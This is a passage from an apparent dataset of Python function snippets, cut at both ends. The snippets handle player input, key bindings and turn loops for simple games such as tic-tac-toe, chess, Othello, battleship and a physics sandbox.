key + str(draw.get_draw_type().value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"'\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Goal\")\n\n elif key == \"{\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Spawner\")\n\n\n elif key == \"~\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Motor Switch\")\n\n elif key == \"&\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Water\")\n\n\n elif key == \"^\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Low Gravity\")\n\n\n elif key == \"#\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Gravity Switch\")\n\n elif key == \")\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Center\")\n\n elif key == \"%\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Sticky\")\n\n elif key == \"£\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Enlarger\")\n\n\n elif key == \"$\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Shrinker\")\n\n\n elif key == \"0\" and cur_key_type == 0:\n # pause physics\n phys.force_draw_all = not phys.force_draw_all\n options = {\"Draw All\": SelectType.null, \"Draw Set\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"o\" and cur_key_type == 0:\n # pause physics\n draw.reset()\n phys.pause = not phys.pause\n msg.set_message(\"Pause\" + (\" On\" if phys.pause is True else \" Off\"))\n cur_key = \"o\"\n\n elif key == \"*\" and cur_key_type == 0:\n # PICKLE BOARD\n name, blurb = save_gui()\n if not name is None:\n pickler(timer, phys, draw, board, msg, name, blurb)\n msg.set_message(\"State Saved\")\n cur_key = \"*\"\n draw.reset()\n\n elif key == \"-\":\n # LOAD BOARD\n\n timer, phys, draw, board, msg = load_gui(timer, phys, draw, board, msg, persistant=False)\n config = phys.config\n\n elif key == \"5\" and cur_key_type == 0:\n\n load_options()\n phys.change_config(board=board)\n\n elif key == \"6\" and cur_key_type == 0:\n\n board, phys, msg = update_background(board, phys, msg)\n\n\n elif key == \"j\" and cur_key_type == 0:\n # draw joints\n draw.reset()\n options = {\"Merge Blocks\": SelectType.select,\n \"Distance Joint\": SelectType.straight_join, \"Rope Joint\": SelectType.straight_join,\n \"Prismatic Joint\": SelectType.straight_join,\n \"Electric\": SelectType.line_join,\n \"Chain\": SelectType.line_join2,\n \"Weld Joint\": SelectType.straight_join, \"Wheel Joint\": SelectType.circle,\n \"Rotation Joint\": SelectType.rotation_select, \"Pulley\": SelectType.d_straight_join}\n\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"tab\":\n # Tab key press, this switches to move mode\n if cur_key_type == 0:\n cur_key_type = 1\n msg.set_message(\"Drawing Mode Enabled\")\n draw.reset()\n else:\n cur_key_type = 0\n msg.set_message(\"Create Mode Enabled\")\n draw.reset()\n\n\n # Drawing mode buttons\n\n elif key == \"`\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Change Keys\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Screen Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Center Clicked\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"]\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Fire Bullet\": SelectType.bullet_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"[\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Choose Player\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"3\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Forwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Backwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"9\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Force\")\n\n elif key == \"0\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative Force\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"5\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CCW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"6\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"7\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"8\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative Impulse\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"!\" and cur_key_type == 1:\n \"\"\"\n Used to attach an relative impulse to a block\n \"\"\"\n board.translation = np.array([0, 0])\n\n # do move keypresses:\n if cur_key_type == 1:\n phys.do_keypress(key)\n\n return cur_key_type, cur_key, draw, phys, msg, timer, board", "def play(self):\n for step_i in range(self.max_step):\n player_id = step_i & 1\n player = self.players[player_id]\n action = player.nxt_move()\n if isinstance(player, mcts.MCTSPlayer) and player.value_net.loggable:\n print(f'Player{player_id}: Action: {action}')\n if not self.is_valid_action(action):\n # because now just consider 2 players\n print(f\"Player: {player_id}, Action: {action} Did Not choose a valid action!\")\n self.board[action // self.w][action % self.w] = player_id\n self.winner = 1 - player_id\n else:\n self.board[action // self.w][action % self.w] = player_id\n self.winner = self.k0()\n self.players[1 - player_id].other_nxt_move(action)\n if self.winner != -1:\n break\n print(f'Winner: {self.winner}')\n for player_id in range(len(self.players)):\n self.players[player_id].game_ended()", "def user_input(self):\n\n # Above, we set the timeout of getch() on entryscreen to 500ms. That means\n # that the invalid character (-1) is returned every 500 ms if the user\n # enters nothing, and our validator is called. We take this opportunity to\n # relese the curses lock so any other threads (e.g. the message handling\n # thread) have a chance to update the screen. Additionally, we call\n # update() so that any other changes are picked up. We raise _StoppedError\n # to get out of the surrounding loop in edit() so that we can exit this\n # function cleanly and without hijacking any other exceptions (such as\n # KeyboardInterrupt).\n\n class _StoppedError(Exception):\n pass\n\n def validator(ch):\n if ch == curses.KEY_RESIZE:\n self.chatscreen.clear()\n (y, x) = self.global_screen.getmaxyx()\n curses.resizeterm(y, x)\n self.chatscreen.resize(y-Chat.CHATBOX_SIZE, x)\n self.entryscreen.mvwin(y-Chat.CHATBOX_SIZE, 0)\n self.update()\n return None\n try:\n self.curses_lock.release()\n if not self.running:\n raise _StoppedError\n self.update() # has anything changed?\n if ch < 0:\n return None\n return ch\n finally:\n self.curses_lock.acquire()\n\n try:\n self.curses_lock.acquire()\n cmd = self.textpad.edit(validator)\n self.entryscreen.clear()\n except _StoppedError:\n return ''\n finally:\n self.curses_lock.release()\n\n # strip the newlines out of the middle of the words\n cmd = string.replace(cmd, '\\n', '')\n\n # remove unprintable characters\n cmd = (''.join(c if c in string.printable else '' for c in cmd)).strip()\n\n # process commands if necessary\n if cmd.startswith('/'):\n words = cmd.split()\n cmdname = words[0][1:]\n args = words[1:]\n\n if cmdname in self.commands:\n try:\n self.commands[cmdname](*args)\n except CommandError as e:\n self.message('System:', 'Problem executing command: ' + str(e))\n except TypeError as e:\n self.message('System:', str(e))\n else:\n self.message('System:', 'Unknown command: '+cmdname)\n else:\n # it's not a cmd so it must be a message to send\n self.q.put(cmd)\n self.update()", "def move(self,board,n,display):\n\n\t\tmove = False\n\t\tgoodInput = False\n\t\tn = 0\n\n\t\twhile not goodInput:\n\t\t\tpygame.time.wait(10)\n\t\t\tdisplay.displayBoard()\n\t\t\tmove = display.getMove()\n\n\t\t\tif move == \"End Preset\":\n\t\t\t\treturn move\n\n\t\t\tif move and tuple(move) in board.openPoints():\n\t\t\t\tgoodInput = True\n\t\t\telif move:\n\t\t\t\tprint \"Bad input, try again!\"\n\n\t\t\tn += 1\n\n\t\treturn move", "def host_game(self):\n current_side = \"X\"\n while ( (not self.win_for(\"X\"))\n and (not self.win_for(\"O\"))\n and (not self.is_full())):\n print()\n print(self)\n print()\n move = Board.INVALID_MOVE\n while not self.allows_move(move):\n move = int(input(current_side + \"'s move: \"))\n self.add_move(move, current_side)\n if current_side == \"X\":\n current_side = \"O\"\n else:\n current_side = \"X\"\n\n if self.win_for(\"X\"):\n print(\"X wins --- congratulations!\\n\")\n elif self.win_for(\"O\"):\n print(\"O wins --- congratulations!\\n\")\n else:\n print(\"Tied game!\\n\")\n\n print()\n print(self)", "def human_expert(_obs):\n\n while True:\n env.render()\n print_play_keys(env.action_str)\n time.sleep(0.2)\n key_pressed = keyboard.read_key()\n # return index of action if valid key is pressed\n if key_pressed:\n if key_pressed in KEY_ACTION_DICT:\n return KEY_ACTION_DICT[key_pressed]\n elif key_pressed == \"esc\":\n print(\"You pressed esc, exiting!!\")\n break\n else:\n print(\"You pressed wrong key. Press Esc key to exit, OR:\")", "def input(self, event):\n # If the window is quit.\n if event.type == pygame.QUIT:\n # Exit the game.\n return 0\n\n # If escape is hit.\n if (\n event.type == pygame.QUIT\n or event.type == pygame.KEYDOWN\n and event.key == pygame.K_ESCAPE\n ):\n # Return to the menu.\n return 1\n\n # If SPACE is hit.\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n # If the player can move\n if self.background1.getMoving():\n # Jump sound effect.\n self.jumpSound.play()\n # Make the player jump.\n self.player.jump()\n\n # If game end.\n if self.gameEnd:\n # If the exit button is pressed.\n if self.exitButton.input(event):\n return 1\n # If the exit button is pressed.\n if self.retryButton.input(event):\n self.reset()\n\n # Continue the game.\n return 2", "def main():\n \n is_white_move = True\n board = initial_state()\n print_board(board)\n \n while True:\n if is_white_move == True:\n print()\n result = str(input(\"White's move: \"))\n else:\n print()\n result = str(input(\"Black's move: \"))\n\n if result == 'h' or result == 'H':\n print(HELP_MESSAGE)\n print_board(board)\n elif result == 'q' or result == 'Q':\n confirm_quit = str(input(\"Are you sure you want to quit? \"))\n if confirm_quit == 'y' or confirm_quit == \"Y\":\n break\n else:\n print_board(board) \n\n else:\n if valid_move_format(result) == False:\n print('Invalid move')\n print()\n print_board(board)\n else:\n move = process_move(result)\n if is_move_valid(move, board, is_white_move): \n board = update_board(board, move)\n print_board(board)\n is_white_move = not is_white_move\n if check_game_over(board, is_white_move):\n break\n else:\n print('Invalid move')\n print()\n print_board(board)", "def receive_play(current_player, marks, board_state):\n valid_answer = False\n while not valid_answer:\n current_play = input(\n \"{}, choose a square (1-9) to place your {}. \".format(current_player, marks[current_player]))\n valid_answer = check_inputs(filter_occupied(board_state), current_play)\n if valid_answer:\n current_play = int(current_play)\n board_state[current_play - 1] = marks[current_player]\n return board_state", "def play(state, player_turn, human_marker, depth):\n alpha = -10\n beta = 10\n while True:\n draw_board(state)\n marker = is_terminal(state)\n\n if marker is not None:\n if marker == 'X':\n print(\"The winner is 'X'!\")\n elif marker == 'O':\n print(\"The winner is 'O'!\")\n else:\n print(\"The game ended in a tie!\")\n return\n\n # Presumably AI's turn.\n if player_turn == 0:\n ai_marker = 'X' if human_marker == 'O' else 'O'\n if ai_marker == 'X':\n value, move = max_value(state, ai_marker, depth, alpha, beta)[:2]\n else:\n value, move = min_value(state, ai_marker, depth, alpha, beta)[:2]\n depth = depth + 1\n state[move[0]][move[1]] = ai_marker\n player_turn = 1\n\n # Presumably human player's turn.\n else:\n move = list(map(int, input('Enter your move: ').strip('[]').split(',')))\n while not is_valid_move(state, move):\n move = list(map(int, input('Enter your move: ').strip('[]').split(',')))\n\n state[move[0]-1][move[1]-1] = human_marker\n depth = depth + 1\n player_turn = 0", "def next_turn(self): \n if (self.moves):\n self.board = self.select_move() \n self.moves = []\n self.roll = self.roll_dice()\n self.player = not self.player\n self.generate_valid_moves()", "def run_game():\n mainBoard = get_new_board()\n resetBoard(mainBoard)\n showHints = False\n\n turn = random.choice(['computer', 'player'])\n\n # Draw the starting board and ask the player what color they want.\n draw_board(mainBoard)\n\n playerTile, computer_tile = enter_player_tile()\n # Make the Surface and Rect objects for the \"New Game\" and \"Hints\" buttons\n\n newGameSurf = FONT.render('New Game', True, TEXTCOLOR, TEXTBGCOLOR2)\n newGameRect = newGameSurf.get_rect()\n newGameRect.topright = (WINDOWWIDTH - 8, 10)\n\n hintsSurf = FONT.render('Hints', True, TEXTCOLOR, TEXTBGCOLOR2)\n hintsRect = hintsSurf.get_rect()\n hintsRect.topright = (WINDOWWIDTH - 8, 40)\n\n while True: # main game loop\n # Keep looping for player and computer's turns.\n if turn == 'player':\n # Player's turn:\n if get_valid_moves(mainBoard, playerTile) == []:\n # If it's the player's turn but they\n # can't move, then end the game.\n break\n\n movexy = None\n\n while movexy == None:\n # Keep looping until the player clicks on a valid space.\n # Determine which board data structure to use for display.\n if showHints:\n boardToDraw = get_board_with_valid_moves(mainBoard, playerTile)\n else:\n boardToDraw = mainBoard\n\n check_for_quit()\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n # Handle mouse click events\n mousex, mousey = event.pos\n if newGameRect.collide_point((mousex, mousey)):\n # Start a new game\n return True\n elif hintsRect.collide_point((mousex, mousey)):\n # Toggle hints mode\n showHints = not showHints\n # movexy is set to a two-item tuple XY coordinate, or None value\n movexy = get_space_clicked(mousex, mousey)\n\n if movexy != None and not isValidMove(mainBoard, playerTile, movexy[0], movexy[1]):\n movexy = None\n\n # Draw the game board.\n draw_board(boardToDraw)\n draw_info(boardToDraw, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n MAINCLOCK.tick(FPS)\n pygame.display.update()\n\n # Make the move and end the turn.\n make_move(mainBoard, playerTile, movexy[0], movexy[1], True)\n if get_valid_moves(mainBoard, computer_tile) != []:\n # Only set for the computer's turn if it can make a move.\n turn = 'computer'\n else:\n # Computer's turn:\n if get_valid_moves(mainBoard, computer_tile) == []:\n # If it was set to be the computer's turn but\n # they can't move, then end the game.\n break\n\n # Draw the board.\n draw_board(mainBoard)\n draw_info(mainBoard, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n # Make it look like the computer is thinking by pausing a bit.\n pauseUntil = time.time() + random.randint(5, 15) * 0.1\n\n while time.time() < pauseUntil:\n pygame.display.update()\n\n # Make the move and end the turn.\n x, y = get_computer_move(mainBoard, computer_tile)\n make_move(mainBoard, computer_tile, x, y, True)\n\n if get_valid_moves(mainBoard, playerTile) != []:\n # Only set for the player's turn if they can make a move.\n turn = 'player'\n\n # Display the final score.\n draw_board(mainBoard)\n scores = get_score_of_board(mainBoard)\n # Determine the text of the message to display.\n\n if scores[playerTile] > scores[computer_tile]:\n text = 'You beat the computer by %s points! Congratulations!' % \\\n (scores[playerTile] - scores[computer_tile])\n elif scores[playerTile] < scores[computer_tile]:\n text = 'You lost. The computer beat you by %s points.' % \\\n (scores[computer_tile] - scores[playerTile])\n else:\n text = 'The game was a tie!'\n\n textSurf = FONT.render(text, True, TEXTCOLOR, TEXTBGCOLOR1)\n textRect = textSurf.get_rect()\n textRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))\n DISPLAYSURF.blit(textSurf, textRect)\n\n # Display the \"Play again?\" text with Yes and No buttons.\n text2Surf = BIGFONT.render('Play again?', True, TEXTCOLOR, TEXTBGCOLOR1)\n text2Rect = text2Surf.get_rect()\n text2Rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 50)\n\n # Make \"Yes\" button.\n yesSurf = BIGFONT.render('Yes', True, TEXTCOLOR, TEXTBGCOLOR1)\n yesRect = yesSurf.get_rect()\n yesRect.center = (int(WINDOWWIDTH / 2) - 60, int(WINDOWHEIGHT / 2) + 90)\n\n # Make \"No\" button.\n noSurf = BIGFONT.render('No', True, TEXTCOLOR, TEXTBGCOLOR1)\n noRect = noSurf.get_rect()\n noRect.center = (int(WINDOWWIDTH / 2) + 60, int(WINDOWHEIGHT / 2) + 90)\n\n while True:\n # Process events until the user clicks on Yes or No.\n check_for_quit()\n\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n mousex, mousey = event.pos\n\n if yesRect.collide_point((mousex, mousey)):\n return True\n\n elif noRect.collide_point((mousex, mousey)):\n return False\n\n DISPLAYSURF.blit(textSurf, textRect)\n DISPLAYSURF.blit(text2Surf, text2Rect)\n DISPLAYSURF.blit(yesSurf, yesRect)\n DISPLAYSURF.blit(noSurf, noRect)\n\n pygame.display.update()\n MAINCLOCK.tick(FPS)", "def human(gstate: TicTacToe, *args):\n return input_with_validation(\"Please enter move.\", list(gstate.next_moves.keys()))", "def play_game(word_list):\n hand = None\n while True:\n game_type = raw_input('Please choose from the following: n(new random hand), r(last hand) or e(exit the game):')\n if game_type == 'n':\n hand = deal_hand(HAND_SIZE)\n player_type = raw_input('Please choose from the following: u(user can play) or c(computer can play):')\n if player_type == 'u':\n play_hand(hand, word_list)\n elif player_type == 'c':\n comp_play_hand(hand, word_list)\n else: \n player_type = raw_input('Incorrect input. Please choose from the following: u(user can play) or c(computer can play):')\n elif game_type == 'r' and hand == None:\n print 'Incorrect input. Please first choose n.'\n elif game_type == 'r':\n player_type = raw_input('Please choose from the following: u(user can play) or c(computer can play):')\n if player_type == 'u':\n play_hand(hand, word_list)\n elif player_type == 'c':\n comp_play_hand(hand, word_list)\n else: \n player_type = raw_input('Incorrect input. Please choose from the following: u(user can play) or c(computer can play):') \n elif game_type == 'e':\n print \"Exited the game.\"\n break\n else: \n print 'Incorrect input.'", "def advance(self, board):", "def play_turn(self, player):\n input('Play turn...')\n print(f'{player.name} to play...\\n')\n \n if isinstance(player, ComputerPlayer):\n print('Thinking...')\n time.sleep(1)\n row, col = player.algorithm(self.board)\n self.board.play(row, col, player.token) # algorithms index from (0,0) - so adjust this to (1,1) etc \n else:\n print(self.board)\n while True:\n usr_input = input(f'{player.name}, enter a move: ')\n \n if usr_input.lower() == 'exit':\n print(f'{player.name} exited!')\n self.exit_flag = True\n return\n\n if usr_input.lower() == 'skip':\n print(f'{player.name} has skipped their go!')\n return\n\n row, col = [int(i) for i in usr_input.split(' ')]\n try:\n self.board.play(row - 1, col - 1, player.token) # index top-left corner as (1,1) in player input, vs (0,0) everywhere else\n except IndexError as e:\n print(str(e), 'Play a different position.')\n else:\n break\n print(f'{player.name} played: ({row + 1}, {col + 1})\\n')\n print(self.board)", "def next_action():\n while True:\n next = input('Enter Q to quit programme. M to return to main menu \\n')\n if next.lower() == 'q':\n logout()\n elif next.lower() == 'm':\n hr_main()\n is_invalid()", "def get_input(self):\n result = None\n\n try:\n while True:\n result = self.console.read_for_condition(prompt=\">>> \", condition=self.is_valid_input)\n\n if result is not None:\n break\n except KeyboardInterrupt:\n quit()\n\n # run command for next condition\n self.game_branch[result]()", "def _handleInput(self):\n\n Game.Player.running(Game.ControlState[Game.MoveRight], not (Game.ControlState[Game.MoveRight] == Game.ControlState[Game.MoveLeft]))\n Game.Player.jumping(Game.ControlState[Game.Jump])\n Game.Player.flying(Game.ControlState[Game.Fly])\n Game.Player.firing(Game.ControlState[Game.Fire])", "def control(self):\n while not (self.game_over() or self.quit):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_r:\n self.play()\n elif event.key == pygame.K_m:\n self.__init__()\n elif event.key == pygame.K_LEFT and len(self.sequence)>=2:\n self.sequence.pop()\n self.board = self.sequence.pop()\n self.draw()\n elif event.key == pygame.K_1:\n self.tip(1)\n elif event.key == pygame.K_2:\n self.tip(2)\n elif event.key == pygame.K_3:\n self.tip(3)\n elif event.key == pygame.K_4:\n self.tip(4)\n elif event.key == pygame.K_5:\n self.tip(5)\n \n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n ## if mouse is pressed get position of cursor ##\n pos = pygame.mouse.get_pos()\n ## check if cursor is on button ##\n for i in range(len(self.buttons)):\n for j in range(len(self.buttons[i])):\n if self.buttons[i][j].collidepoint(pos):\n if self.selected == None:\n self.selected = [i,j]\n elif self.selected == [i,j]:\n self.selected = None\n elif self.board[self.selected[0]][self.selected[1]]==0:\n self.selected = [i,j]\n else:\n if self.move(i,j):\n self.selected = None\n self.draw()\n return True\n else:\n self.selected = None\n self.draw()\n return False\n self.draw()\n return False", "def main():\r\n clean()\r\n h_choice = '2' # \r\n c_choice = '1' # \r\n first = '' # if human is the first\r\n\r\n # Human may starts first\r\n clean()\r\n while first != 'Y' and first != 'N':\r\n try:\r\n print(\" $$\\ $$\\ $$$$$$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$$\\ $$$$$$$\\ $$$$$$\\ \") \r\n print(\" $$ | $$ |$$ __$$\\ $$ __$$\\ $$ __$$\\ $$ _____|$$ __$$\\ $$ __$$\\ \")\r\n print(\" $$ | $$ |$$ / $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ / \\__|\")\r\n print(\" $$$$$$$$ |$$ | $$ |$$$$$$$ |$$$$$$$ |$$$$$\\ $$$$$$$ |\\$$$$$$\\ \")\r\n print(\" $$ __$$ |$$ | $$ |$$ ____/ $$ ____/ $$ __| $$ __$$< \\____$$\\ \")\r\n print(\" $$ | $$ |$$ | $$ |$$ | $$ | $$ | $$ | $$ |$$\\ $$ |\")\r\n print(\" $$ | $$ | $$$$$$ |$$ | $$ | $$$$$$$$\\ $$ | $$ |\\$$$$$$ |\")\r\n print(\" \\__| \\__| \\______/ \\__| \\__| \\________|\\__| \\__| \\______/ \") \r\n \r\n first = input('First to start?[y/n]: ').upper()\r\n except (EOFError, KeyboardInterrupt):\r\n print('Bye')\r\n exit()\r\n except (KeyError, ValueError):\r\n print('Bad choice')\r\n\r\n # Main loop of this game\r\n while len(empty_cells(board)) > 0 and not game_over(board):\r\n \r\n if first == 'N':\r\n print(\"Step\")\r\n xi = int (input(\"Initial row COMP(0-9): \"))\r\n yi = int (input(\"Initial column COMP(0-9): \"))\r\n ai_turn(c_choice, h_choice, xi, yi)\r\n first = ''\r\n render(board, c_choice, h_choice)\r\n print(\"Hope\")\r\n xi = int (input(\"Initial row HUMAN(0-9): \"))\r\n yi = int (input(\"Initial column HUMAN(0-9): \"))\r\n human_turn(c_choice, h_choice,xi,yi)\r\n render(board, c_choice, h_choice)\r\n xi = int (input(\"Initial row COMP(0-9): \"))\r\n yi = int (input(\"Initial column COMP(0-9): \"))\r\n ai_turn(c_choice, h_choice, xi, yi)\r\n\r\n # Game over message\r\n if wins(board, HUMAN):\r\n clean()\r\n print(f'Human turn [{h_choice}]')\r\n render(board, c_choice, h_choice)\r\n print('YOU WIN!')\r\n elif wins(board, COMP):\r\n clean()\r\n print(f'Computer turn [{c_choice}]')\r\n render(board, c_choice, h_choice)\r\n print('YOU LOSE!')\r\n else:\r\n clean()\r\n render(board, c_choice, h_choice)\r\n print('DRAW!')\r\n\r\n exit()", "def prompt_player(self):\n board = self.draw_board()\n print board\n self.player_moves(self.board_values)", "def play_game() -> None:\n board = tuple(tuple(0 for _ in range(i, i + 16))\n for i in range(0, 64, 16))\n state = GameState(board, 1)\n while state.util is None:\n # human move\n print(state.display)\n state = state.traverse(int(input(\"Move: \")))\n if state.util is not None:\n break\n # computer move\n find_best_move(state)\n move = (state.selected if state.selected != -1\n else random.choice(state.moves))\n state = state.traverse(move)\n print(state.display)\n if state.util == 0:\n print(\"Tie Game\")\n else:\n print(f\"Player {state.util} Wins!\")", "def run_game(self):\n n = 1\n while self._run:\n # lock Framerate\n self._clock.tick(self._fps)\n # Process Input\n self._map.drawmap(self._screen)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._run = False\n if (event.type == pygame.KEYDOWN):\n print(\"KeyDown\")\n if (event.key == pygame.K_SPACE):\n print(\"KeySpace\")\n self.move_to_next_turn()\n\n \"\"\"\n All Test Code\n \"\"\"\n if (self._player_turn == 1 and n == 1):\n self._screen.blit(self._core_deck.draw_deck(), (105, 130))\n for player in self._player_list:\n self._screen.blit(self._core_deck.draw_deck(), (105, 130))\n for player in self._player_list:\n print(player._name)\n player.show_hand()\n print(\"Deck: \\n\")\n self._core_deck.print_deck()\n print(self._player_list[0]._name)\n print(\"Playing a card...\")\n self._core_deck.go_to_graveyard(self._player_list[0].play_card(1))\n print(\"The hand:\")\n self._player_list[0].show_hand()\n print(\"Main Deck:\")\n self._core_deck.print_deck()\n print(\"Graveyard:\")\n self._core_deck.show_graveyard()\n for player in self._player_list:\n print(player._name)\n player.print_units()\n n = 2\n pygame.display.update()", "def start():\n boards = [Board(board_size, number_of_game_pieces, 1), Board(board_size, number_of_game_pieces, 2)]\n gameover = False\n quitgame = False\n i = 1\n while not gameover:\n coords_accepted = False\n while not coords_accepted:\n inp = input(\n f\"Player {boards[(i + 1) % 2].player_id}, what is the coordinate you're targeting (row,column,layer)?\")\n if inp == \"show\":\n print(boards[(i + 1) % 2])\n continue\n elif inp == \"quit\":\n quitgame = True\n break\n elif boards[i].test_coords_valid(inp):\n coords_accepted = True\n else:\n print(\"Invalid coordinates. \")\n if quitgame:\n print(\"Quitting game\")\n break\n x, y, z = eval(inp)\n gameover = boards[i].strike(x, y, z)\n if gameover:\n print(f\"Game over, player #{boards[(i + 1) % 2].player_id} won!\")\n i = (i + 1) % 2", "def game():\n board = create_board(8)\n character = create_character()\n reached_goal = False\n while not reached_goal:\n display_position(board, character)\n direction = input(\"Please enter a key in 'wasd' to move that direction. You cannot move pass the edge of the \"\n \"map.\")\n if validate_move(board, character, direction):\n move_character(direction, character)\n reached_goal = is_win(character, board)\n else:\n print(\"Please select a valid input. Enter a wasd key and do not move past the walls!\")\n display_position(board, character)\n print(\"You win!\")", "def main():\n # each square in the board is assigned a label (1a-3c)\n board_values = deepcopy(c.INITIAL_BOARD_VALUES)\n\n print_welcome_message(board_values)\n\n winner = None\n current_player = None\n while winner is None:\n # current player is either \"X\" or \"O\"\n current_player = get_next_player(current_player)\n\n # ask the current player to choose a square\n chosen_square = get_next_move(current_player, board_values)\n\n # update the board, show it, and check for a winner or a full board\n board_values[chosen_square] = current_player\n print_board(board_values)\n winner = get_winner(board_values)\n\n print(get_final_message(winner))", "def we_move(self):\n if self.player_squares.__len__() == 0:\n print \"This is the first move!\"\n self.record_move(self.our_squares, self.our_symbol, 5)\n self.finish_move(self.our_symbol, self.our_squares)\n else:\n print \"This is not the first move.\"\n # See where we should move next\n # Take square 5 if it's open\n if self.is_square_free(5):\n print \"Taking square 5.\"\n self.record_move(self.our_squares, self.our_symbol, 5)\n self.finish_move(self.our_symbol, self.our_squares)\n else:\n # See if the player is about to win\n print \"Square 5 is gone. Picking another.\"\n for win in TicTacToe.wins:\n print \"Testing winning combos for player.\"\n win_count = 0\n win_matches = []\n win_misses = []\n for i in win:\n if i in self.player_squares:\n print \"square %d is in win\" % i\n win_count += 1\n win_matches.append(i)\n elif i not in self.our_squares:\n win_misses.append(i)\n print \"win_count is %s\" % win_count\n if win_count == 2 and win_misses.__len__() > 0:\n print \"Uh-oh! Looks like the player might win soon.\"\n print \"win is %s\" % win\n print \"win_matches is %s\" % win_matches\n print \"win_misses is %s\" % win_misses[0]\n self.record_move(self.our_squares, self.our_symbol, win_misses[0])\n self.finish_move(self.our_symbol, self.our_squares)\n return\n # Try to block based on the player's last move\n if self.players_last_move == 1:\n if self.is_square_free(2):\n self.record_move(self.our_squares, self.our_symbol, 2)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(4):\n self.record_move(self.our_squares, self.our_symbol, 4)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(3):\n self.record_move(self.our_squares, self.our_symbol, 3)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(7):\n self.record_move(self.our_squares, self.our_symbol, 7)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.players_last_move == 3:\n if self.is_square_free(2):\n self.record_move(self.our_squares, self.our_symbol, 2)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(6):\n self.record_move(self.our_squares, self.our_symbol, 6)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(9):\n self.record_move(self.our_squares, self.our_symbol, 9)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.is_square_free(1):\n self.record_move(self.our_squares, self.our_symbol, 1)\n self.finish_move(self.our_symbol, self.our_squares)\n elif self.players_last_move == 9:\n if self.is_square_free(6):\n self.record_move(self.our_squares, self.our_symbol, 